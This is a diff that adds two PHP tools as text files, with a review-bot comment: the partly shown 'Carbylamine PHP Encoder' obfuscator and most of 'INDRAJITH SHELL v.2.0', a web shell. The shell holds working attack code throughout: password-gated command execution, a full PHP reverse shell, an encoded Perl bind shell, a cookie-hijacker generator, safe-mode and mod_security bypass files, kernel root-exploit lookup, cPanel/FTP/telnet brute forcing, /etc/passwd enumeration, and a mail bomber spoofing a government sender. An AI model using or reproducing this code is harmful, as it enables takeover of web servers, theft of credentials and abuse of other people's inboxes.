diff --git a/php/carbylamine.txt b/php/carbylamine.txt
new file mode 100644
index 0000000..0a3f4df
--- /dev/null
+++ b/php/carbylamine.txt
@@ -0,0 +1,103 @@ +=5;$i++) + { + $in[$i]=' '; + } + return $in; + } + else + { + return $in; + } +} +function makeoutfile($str) +{ $funcname=rstr(); +$varname='$'.rstr(); +$template= +""; + return $template; +} +function main($argc,$argv) +{ +$banner= +"\n +-------------------------------------------------------------------+ + |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++| + |+ +| + +____ _ _ _ +| +/ __ \ | | | | (_) +| +| / \/ __ _ _ __ | |__ _ _ | | __ _ _ __ ___ _ _ __ _+|_ +| | / _` || '__|| '_ \ | | | || | / _` || '_ ` _ \ | || '_ \ / _ \ +| \__/\| (_| || | | |_) || |_| || || (_| || | | | | || || | | || __/ + \____/ \__,_||_| |_.__/ \__, ||_| \__,_||_| |_| |_||_||_| |_| \___| + |+ __/ | +| + |+ Carbylamine PHP Encoder +| + |+ v0.1.1 Nightly +| + |+ +| + |+ +| + |+ Coded by Prakhar Prasad +| + |+ (prakharpd@gmail.com) +| + |+ +| + |+ +| + |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++| + +-------------------------------------------------------------------+\n\n"; +$usage="$banner Syntax: ".$_SERVER['PHP_SELF']." \n"; +if($argc==1) {echo $usage ; die();} +if($argc>1) $file = $argv[1]; +if($argc>2) $outfile = $argv[2]; +if(empty($file) || empty($outfile)) { echo "Input/Output filename not entered!\n\n\x07" ;die();} +if(!file_exists($file)) +{ +echo "$banner Error: Input file doesn't exist\n\n\x07"; +} +else{ +$orginal_size=round(filesize($file)/1024,2); +echo "$banner Encoding : $file ($orginal_size KB) \n\n "; +$output_filename=$outfile; +$outfile=fopen($outfile,'w+'); +$file=fread(fopen($file,'r'),filesize($file)); +$outdata=makeoutfile(striptag($file)); +$newsize=round(strlen($outdata)/1024,2); +echo " Compression : ".@round(100-(($newsize*100)/($orginal_size!=0?$orginal_size:1)),2)."%\n\n"; +if(!fwrite($outfile,$outdata)) +{ + echo " Unable to write to $output_filename\n\n\x07"; +} +else +{ +echo " Successfully Encoded! to $output_filename\n\n" ; +}}} +main($argc,$argv); +?> 
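Review bot: In `main()` neither `fopen()` result is checked, and the output path is opened with `'w+'` before the input is read, so an input that exists but cannot be read still truncates an existing output file and then hands `false` to `fread()`/`fwrite()`. Read the input first and stop on failure, for example `$src = file_get_contents($file); if ($src === false) { echo " Unable to read $file\n"; exit(1); }`, and only then open `$outfile`. The missing-input branch only echoes and falls through, so the script exits with status 0 on that error, and no `fclose()` appears in the visible lines. The top of the file (everything before `=5;$i++)`) and the body of `$template` appear to have been lost in extraction, so this covers only the visible part of the hunk.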
diff --git a/php/indrajith-2.0.txt b/php/indrajith-2.0.txt new file mode 100644 index 0000000..62a2e16 --- /dev/null +++ b/php/indrajith-2.0.txt @@ -0,0 +1,2347 @@ +"; //For Ensuring... Fuck all Robots... +/*------------------ End of Anti Crawler -----*/ + + + + echo ""; + echo ""; + if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password)) + { + if($_POST["usrname"]==$username && $_POST["passwrd"]==$password) + { + print''; + if($email!="") + { + mail_alert(); + } + } + else + { + if($_POST['usrname']) + { + print''; + } + echo 'INDRAJITH SHELL v.2.0
+

+ >>>>>>>>>>>>>>><<<<<>>>>>>>>>> +

+
+
INDRAJITH SHELL v.2.0
+
+ + +
+ + +
Login:
Password:
 
+
'; + exit; + } + } + +$color_g="green"; +$color_b="4C83AF"; +$color_bg="#111111"; +$color_hr="#222"; +$color_wri="green"; +$color_rea="yellow"; +$color_non="red"; +$path=$_GET['path']; + +@session_start(); +@set_time_limit(0); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ignore_user_abort(FALSE); +@ini_set('zlib.output_compression','Off'); + +$sep="/"; +if(strtolower(substr(PHP_OS,0,3))=="win") +{ + $os="win"; + $sep="\\"; + $ox="Windows"; +} +else +{ + $os="nix"; + $ox="Linux"; +} + + + +$self=$_SERVER['PHP_SELF']; +$srvr_sof=$_SERVER['SERVER_SOFTWARE']; +$your_ip=$_SERVER['REMOTE_ADDR']; +$srvr_ip=$_SERVER['SERVER_ADDR']; +$admin=$_SERVER['SERVER_ADMIN']; + +$s_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$ini_php=""; + +$s_htaccess=" +Sec------Engine Off +Sec------ScanPOST Off +"; + +$s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI +AddType application/x-httpd-cgi .sh +AddHandler cgi-script .pl +AddHandler cgi-script .pl"; + +$sym_htaccess="Options all +DirectoryIndex Sux.html +AddType text/plain .php +AddHandler server-parsed .php +AddType text/plain .html +AddHandler txt .html +Require None +Satisfy Any"; + +$sym_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$forbid_dir="Options -Indexes"; + +$cookie_highjacker="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"; +$bind_perl="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"; + +/*----------------------- Top Menu ------------------------------------------*/ + +if($safemode=="On") +{ + echo ""; +} +else +{ + echo ""; +} + +echo ""; + +echo "INDRAJITH SHELL v.2.0
+ + + + + + + +
+
+

INDRAJITH

MINI SHELL +
+
+
OS : + ".$ox." | ".php_uname()."
+ Your IP : ".$your_ip." | Server IP : ".$srvr_ip." | Admin : {$admin}
+ MySQL : "; echo mysqlx(); + echo " | Oracle : "; echo oraclesx(); + echo " | MSSQL : "; echo mssqlx(); + echo " | PostGreySQL : ";echo postgreyx(); + echo "
cURL : ";echo curlx(); + echo " | Total Space : "; echo disc_size(); + echo " | Free Space : "; echo freesize(); + echo "
Software : {$srvr_sof} | PHP : ".phpversion()." +
Disabled Functions : ";echo disabled_functns()."
"; + if($os == 'win'){ echo "Drives : ";echo drivesx(); } + else { echo "r00t Exploit : "; echo r00t_exploit() .""; } + echo " +
+
"; +echo ""; +/*----------------------- End of Top Menu -----------------------------------*/ + + +/*--------------- FUNCTIONS ----------------*/ +function alert($alert_txt) +{ + echo ""; +} + +function disabled_functns() +{ + if(!@ini_get('disable_functions')) + { + echo "None"; + } + else + { + echo @ini_get('disable_functions'); + } +} + + +function drivesx() +{ + foreach(range('A','Z') as $drive) + { + if(is_dir($drive.':\\')) + { + echo "[".$drive."]"; + } + } +} + +function mail_alert() +{ + global $email, $your_ip; + $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; + $content_mail="Hello Master,\n +Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n +By Indrajith"; + mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com"); +} + +function filesizex($size) +{ + if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; + elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; + elseif ($size>=1024)$size = round(($size/1024),2)." KB"; + else $size .= " B"; + return $size; +} + +function disc_size() +{ + echo filesizex(disk_total_space("/")); +} + +function freesize() +{ + echo filesizex(disk_free_space("/")); +} + +function file_perm($filz){ + if($m=fileperms($filz)){ + $p=''; + $p .= ($m & 00400) ? 'r' : '-'; + $p .= ($m & 00200) ? 'w' : '-'; + $p .= ($m & 00100) ? 'x' : '-'; + $p .= ($m & 00040) ? 'r' : '-'; + $p .= ($m & 00020) ? 'w' : '-'; + $p .= ($m & 00010) ? 'x' : '-'; + $p .= ($m & 00004) ? 'r' : '-'; + $p .= ($m & 00002) ? 'w' : '-'; + $p .= ($m & 00001) ? 
'x' : '-'; + return $p; + } + else return "?????"; +} + + +function mysqlx() +{ + if(function_exists('mysql_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function oraclesx() +{ + if(function_exists('oci_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function mssqlx() +{ + if(function_exists('mssql_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function postgreyx() +{ + if(function_exists('pg_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function strip($filx) +{ + if(!get_magic_quotes_gpc()) return trim(urldecode($filx)); + return trim(urldecode(stripslashes($filx))); +} + +function curlx() +{ + if(function_exists('curl_version')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function filesize_x($filex) +{ + $f_size=filesizex(filesize($filex)); + return $f_size; +} + +function rename_ui() +{ + $rf_path=$_GET['rename']; + echo "

Rename




New Name :






"; +} + +function filemanager_bg() +{ + global $sep, $self; + $path=!empty($_GET['path'])?$_GET['path']:getcwd(); + $dirs=array(); + $fils=array(); + if(is_dir($path)) + { + chdir($path); + if($handle=opendir($path)) + { + while(($item=readdir($handle))!==FALSE) + { + if($item=="."){continue;} + if($item==".."){continue;} + if(is_dir($item)) + { + array_push($dirs, $path.$sep.$item); + } + else + { + array_push($fils, $path.$sep.$item); + } + } + } + else + { + alert("Access Denied for this operation"); + } + } + else + { + alert("Directory Not Found!!!"); + } + echo "
+ + + + + + "; + foreach($dirs as $dir) + { + echo " + + + "; + } + foreach($fils as $fil) + { + echo " + + + "; + } + echo "
NameSizePermissionsActions
".basename($dir)."".filesize_x($dir)."".file_perm($dir)."Delete | Rename
".basename($fil)."".filesize_x($fil)."".file_perm($fil)."Delete | Rename | Edit | Copy
"; +} + +function rename_bg() +{ + if(isset($_GET['old_name']) && isset($_GET['new_name'])) + { + $o_r_path=basename($_GET['old_name']); + $r_path=str_replace($o_r_path, "", $_GET['old_name']); + $r_new_name=$r_path.$_GET['new_name']; + echo $r_new_name; + if(rename($_GET['old_name'], $r_new_name)==FALSE) + { + alert("Access Denied for this action!!!"); + } + else + { + alert("Renamed File Succeessfully"); + } + } +} + +function edit_file() +{ + $path=$_GET['path']; + chdir($path); + $edt_file=$_GET['edit']; + $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); + if($e_content) + { + $o_content=$e_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($edt_file, "rb"); + if(!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $o_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

Edit File



View File : ". basename($_GET['edit']) ."



+

+




"; +} +function edit_file_bg() +{ + if(file_exists($_POST['e_file'])) + { + $handle = fopen($_POST['e_file'],"w+"); + if (!handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$_POST['e_content_n']); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); + } + else + { + alert("File Not Found!!!"); + } +} +function delete_file() +{ + $del_file=$_GET['del_fil']; + if(unlink($del_file) != FALSE) + { + alert("Deleted Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function deldirs($d_dir) +{ + $d_files= glob($d_dir.'*', GLOB_MARK); + foreach($d_files as $d_file) + { + if(is_dir($d_file)) + { + deldirs($d_file); + } + else + { + unlink($d_file); + } + } + if(is_dir($d_dir)) + { + if(rmdir($d_dir)) + { + alert("Deleted Directory Successfully"); + } + else + { + alert("Access Denied for this Operation"); + } + } +} + +function code_viewer() +{ + $path=$_GET['path']; + $r_file=$_GET['read']; + $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); + if($r_content) + { + $rr_content=$r_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($r_file, "rb"); + if (!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $rr_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

View File



Edit File : ". basename($_GET['read']) ."


".$rr_content."





"; +} +function copy_file_ui() +{ + echo "

Copy File




Copy : To : Name :






"; +} +function copy_file_bg() +{ + global $sep; + if(function_exists(copy)) + { + if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) + { + alert("Succeded"); + } + else + { + alert("Access Denied"); + } + } +} +function ch_perm_bg() +{ + if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) + { + if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) + { + alert("Succeded. Permission Changed!!!"); + } + else + { + alert("Access Denied for This Operation"); + } + } +} +function ch_perm_ui() +{ + $p_file=$_GET['perm']; + echo "

New Permission


New Permission :

Full Access : 755
Notice : Don't use Unix Access like 777, 666, etc. Use 755, 655, etc






"; + ch_perm_bg(); +} +function mk_file_ui() +{ + chdir($_GET['path']); + echo "


+ + New File Name :



+

+
"; +} +function mk_file_bg() +{ + chdir($_GET['path']); + $c_path=$_GET['path']; + $c_file=$_GET['new_f_name']; + $c_file_contents=$_GET['n_file_content']; + $handle=fopen($c_file, "w"); + if(!$handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$c_file_contents); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); +} +function create_dir() +{ + chdir($_GET['path']); + $new_dir=$_GET['new_dir']; + if(is_writable($_GET['path'])) + { + mkdir($new_dir); + alert("Direcory Created Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function cmd($cmd) +{ + chdir($_GET['path']); + $res=""; + if($_GET['cmdexe']) + { + $cmd=$_GET['cmdexe']; + } + if(function_exists('shell_exec')) + { + $res=shell_exec($cmd); + } + else if(function_exists('exec')) + { + exec($cmd,$res); + $res=join("\n",$res); + } + else if(function_exists('system')) + { + ob_start(); + system($cmd); + $res = ob_get_contents(); + ob_end_clean(); + } + elseif(function_exists('passthru')) + { + ob_start(); + passthru($cmd); + $res=ob_get_contents(); + ob_end_clean(); + } + else if(function_exists('proc_open')) + { + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $handle = proc_open($cmd ,$descriptorspec , $pipes); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fread($pipes[1], 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fgets($pipes[1],512); + } + } + } + pclose($handle); + } + + else if(function_exists('popen')) + { + $handle = popen($cmd , "r"); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= fread($handle, 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= 
fgets($handle,512); + } + } + } + pclose($handle); + } + + $res=wordwrap(htmlspecialchars($res)); + if($_GET['cmdexe']) + { + echo "

r00t@TOF:~#


".$res."
"; + } + return $res; +} +function upload_file() +{ + chdir($_POST['path']); + if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) + { + alert("Uploaded File Successfully"); + } + else + { + alert("Access Denied!!!"); + } +} + +function reverse_conn_ui() +{ + global $your_ip; + echo "
+

Reverse Shell


+

+ + + + +
Your IP : + PORT : +
PHP Reverse Shell : nc -l -p port
PERL Bind Shell : nc server_ip port
"; +} +function reverse_conn_bg() +{ + global $os; + $option=$_REQUEST['rev_option']; + $ip=$_GET['my_ip']; + $port=$_GET['my_port']; + if($option=="PHP Reverse Shell") + { + echo "

RESULT



"; + function printit ($string) + { + if (!$daemon) + { + print "$string\n"; + } + } + $chunk_size = 1400; + $write_a = null; + $error_a = null; + $shell = 'uname -a; w; id; /bin/sh -i'; + $daemon = 0; + $debug = 0; + if (function_exists('pcntl_fork')) + { + $pid = pcntl_fork(); + if ($pid == -1) + { + printit("ERROR: Can't fork"); + exit(1); + } + if ($pid) + { + exit(0); + } + if (posix_setsid() == -1) + { + printit("Error: Can't setsid()"); + exit(1); + } + $daemon = 1; + } + else + { + printit("WARNING: Failed to daemonise. This is quite common and not fatal."); + } + chdir("/"); + umask(0); + $sock = fsockopen($ip, $port, $errno, $errstr, 30); + if (!$sock) + { + printit("$errstr ($errno)"); + exit(1); + } + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) + { + printit("ERROR: Can't spawn shell"); + exit(1); + } + stream_set_blocking($pipes[0], 0); + stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0); + stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port "); + while (1) + { + if (feof($sock)) + { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) + { + printit("ERROR: Shell process terminated"); + break; + } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) + { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) + { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) + { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) 
printit("STDERR: $input"); + fwrite($sock, $input); + } + } + fclose($sock); + fclose($pipes[0]); + fclose($pipes[1]); + fclose($pipes[2]); + proc_close($process); + echo "




"; + } + else if($option=="PERL Bind Shell") + { + global $bind_perl, $os; + $pbfl=$bind_perl; + $handlr=fopen("indrajith_perl_bind.pl", "wb"); + if($handlr) + { + fwrite($handlr, gzinflate(base64_decode($bind_perl))); + } + else + { + alert("Access Denied for create new file"); + } + fclose($handlr); + if(file_exists("indrajith_perl_bind.pl")) + { + if($os=="nix") + { + cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port"); + } + else + { + cmd("perl indrajith_perl_bind.pl $port"); + } + } + } +} + +function cookie_jack() +{ + global $cookie_highjacker; + echo "

NOTICE


"; + if(function_exists('fopen') && function_exists('fwrite')) + { + $cook=gzinflate(base64_decode($cookie_highjacker)); + $han_le=fopen("jith_cookie.php", "w+"); + if($han_le) + { + fwrite($han_le, $cook); + echo "Yes... Cookie highjacker is generated.
Name : jith_cookie.php
.
Rename it as 404.php or what you like and highjack cookie of your target.
It is usefull in XSS
It will make a file configuration.txt in this direcory and save the cookie value in it. :p cheers...




"; + } + else + { + echo "Sorry... Generate COOKIE HIGHJACKER failed




"; + } + } +} + + + +function safe_mode_fuck() +{ + global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; + $path = chdir($_GET['path']); + chdir($_GET['path']); + switch($_GET['safe_mode']) + { + case "s_php_ini": + $s_file=$s_php_ini; + $s_name="php.ini"; + break; + case "s_htaccess": + $s_name=".htaccess"; + $s_file=$s_htaccess; + break; + case "s_htaccess_pl": + $s_name=".htaccess"; + $s_file=$s_htaccess_pl; + break; + case "s_ini_php": + $s_name="ini.php"; + $s_file=$ini_php; + break; + + } + if(function_exists('fopen')&& function_exists('fwrite')) + { + $s_handle=fopen("$s_name", "w+"); + if($s_handle) + { + fwrite($s_handle, $s_file); + alert("Operation Succeed!!!"); + } + else + { + alert("Access Denied!!!"); + } + fclose($s_handle); + } +} +function safe_mode_fuck_ui() +{ + global $path; + $path=getcwd(); + echo ""; +} + + +function AccessDenied() +{ + global $path, $forbid_dir; + $path=$_GET['path']; + chdir($path); + if(function_exists('fopen') && function_exists('fwrite')) + { + $forbid=fopen(".htaccess", "wb"); + if($forbid) + { + fwrite($forbid, $forbid_dir); + alert("Opreation Succeeded"); + } + else + { + alert("Access Denied"); + } + fclose($forbid); + } +} + +function r00t_exploit() +{ + $kernel = php_uname(); + $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, 
krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace'); + foreach($r00t_db as $kern=>$exp) + { + if(strstr($kernel, $kern)) + { + return $exp; + } + else + { + $exp='Not found.'; + return $exp; + } + } +} + +function php_ende_ui() +{ + echo "

PHP ENCODE/DECODE


+ +
+ Method : TYPE :





"; +} +function php_ende_bg() +{ + $meth_d=$_POST['typed']; + $typ_d=$_POST['typenc']; + $c_ntent=$_POST['php_content']; + $c_ntent=$c_ntent; + switch($meth_d) + { + case "Encode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "GZUNCOMPRESS": + $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "STR_ROT13": + $res_t=trim(stripslashes($c_ntent.' '),''); + $res_t=base64_encode(str_rot13($res_t)); + $res_t=""; + break; + } + break; + case "Decode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=gzinflate(base64_decode($c_ntent)); + break; + case "GZUNCOMPRESS": + $res_t=gzuncompress(base64_decode($c_ntent)); + break; + case "STR_ROT13": + $res_t=str_rot13(base64_decode($c_ntent)); + break; + } + break; + } + echo "

INDRAJITH SHELL


"; +} + +function massmailer_ui() +{ + echo "

MASS MAILER & MAIL BOMBER


+
Mass Mail
FROM :
TO :
Subject :
Mail Bomber
TO :
Subject :
No. of times
"; +} + +function massmailer_bg() +{ + $from=$_POST['from']; + $to=$_POST['to_mail']; + $subject=$_POST['subject_mail']; + $message=$_POST['mail_content']; + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING




Successfully Mails Send... :p




"; + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Sending... :(




"; + } + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Sending... :(




"; + } +} + +function mailbomb_bg() +{ + $rand=rand(0, 9999999); + $to=$_POST['bomb_to']; + $from="president_$rand@whitewhitehouse.gov"; + $subject=$_POST['bomb_subject']." ID ".$rand; + $times=$_POST['bomb_no']; + $content=$_POST['bmail_content']; + if($times=='') + { + $times=1000; + } + while($times--) + { + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING




Successfully Mails Bombed... :p




"; + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Bombing... :(




"; + } + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Bombing... :(




"; + } + } +} + + +/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/ +/*------------------------ Credit Goes to Them ---------------------------------*/ +function cpanel_check($host,$user,$pass,$timeout) +{ + set_time_limit(0); + global $cpanel_port; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print "Error : Connection Timeout. Please Check The Target Hostname ."; + exit; + } + else if (curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" and Password \"$pass\"

"; + } + curl_close($ch); +} + +function cpanel_crack() +{ + set_time_limit(0); + global $os; + echo "
"; + $cpanel_port="2082"; + $connect_timeout=5; + if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) + { + ?> +
+
+ + + + + + + + + + + + + + + + + + + +
Target :
User namesPassword
Guess options :
Timeout delay :
+
+
+ Please Enter The Users or Password List
"; + else + { + $userlist=explode("\n",$_POST['username']); + $passlist=explode("\n",$_POST['password']); + + if($_POST['cracktype'] == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") + { + if($cracktype == "telnet") + { + $cpanel_port="23"; + } + else + $cpanel_port="2082"; + foreach ($userlist as $user) + { + $pureuser = trim($user); + echo " [ - ] + Processing user $pureuser ...

"; + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + } + } + + echo "
"; +} + +function get_users() +{ + $userz = array(); + $user = file("/etc/passwd"); + foreach($user as $userx=>$usersz) + { + $userct = explode(":",$usersz); + array_push($userz,$userct[0]); + } + if(!$user) + { + if($opd = opendir("/home/")) + { + while(($file = readdir($opd))!== false) + { + array_push($userz,$file); + } + } + closedir($opd); + } + $userz=implode(', ',$userz); + return $userz; +} + +function exploit_details() +{ + global $os; + echo "
+

Exploit Server Details




+ + + + "; + if(function_exists('apache_get_modules')) + { + echo ""; + } + if($os=='win') + { + echo " + + "; + } + if($os=='nix') + { + echo " + + + + + + + + + "; + $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $uze=array(); + foreach($useful as $uzeful) + { + if(cmd("which $uzeful")) + { + $uze[]=$uzeful; + } + } + echo ""; + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + $uze=array(); + foreach($downloaders as $downloader) + { + if(cmd("which $downloader")) + { + $uze[]=$downloader; + } + } + echo ""; + echo " + "; + } + echo "
+ OS: ".php_uname(s)."
PHP Version : ".phpversion().".
Kernel Release : ".php_uname(r)."
Kernel Version : ".php_uname(v)."
Machine : ".php_uname(m)." +
Server Software : ".$_SERVER['SERVER_SOFTWARE']."
Loaded Apache modules :

"; + echo implode(', ', apache_get_modules()); + echo "
Account Setting :
".cmd('net accounts')."
User Accounts :
".cmd('net user')."
Distro :
".cmd('cat /etc/*-release')."
Distr name :
".cmd('cat /etc/issue.net')."
GCC :
".cmd('whereis gcc')."
PERL :
".cmd('whereis perl')."
PYTHON :
".cmd('whereis python')."
JAVA :
".cmd('whereis java')."
APACHE :
".cmd('whereis apache')."
CPU :

".cmd('cat /proc/cpuinfo')."
RAM :
".cmd('free -m')."
User Limits :

".cmd('ulimit -a')."
Useful :
";
+              echo implode(', ',$uze);
+              echo "
Downloaders :
";
+              echo implode(', ',$uze);
+              echo "
Users :
".wordwrap(get_users()).">
Hosts :
".cmd('cat /etc/hosts')."





"; +} + +function remote_file_check_ui() +{ + echo "

Remote File Check




+ + +
URL :
Input File's Names in TextArea








"; +} + +function remote_file_check_bg() +{ + set_time_limit(0); + $rtr=array(); + echo "

Scanner Report




"; + $webz=$_POST['rem_web']; + $uri_in=$_POST['tryzzz']; + $r_xuri = trim($uri_in); + $r_xuri=explode("\n", $r_xuri); + foreach($r_xuri as $rty) + { + $urlzzx=$webz.$rty; + if(function_exists('curl_init')) + { + echo ""; + $ch = curl_init($urlzzx); + curl_setopt($ch, CURLOPT_NOBODY, true); + curl_exec($ch); + $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + if($status_code==200) + { + echo ""; + } + else + { + echo ""; + } + } + else + { + echo "cURL Not Found "; + break; + } + } + echo "
Checking : $urlzzx Found....
Not Found...





"; +} + +function remote_download_ui() +{ + echo "

Remote File Download




+ +
URL





"; +} + +function remote_download_bg() +{ + chdir($_GET['path']); + global $os; + $opt=$_GET['type_r_down']; + $rt_ffile=$_GET['rurlfile']; + $name=basename($rt_ffile); + echo "
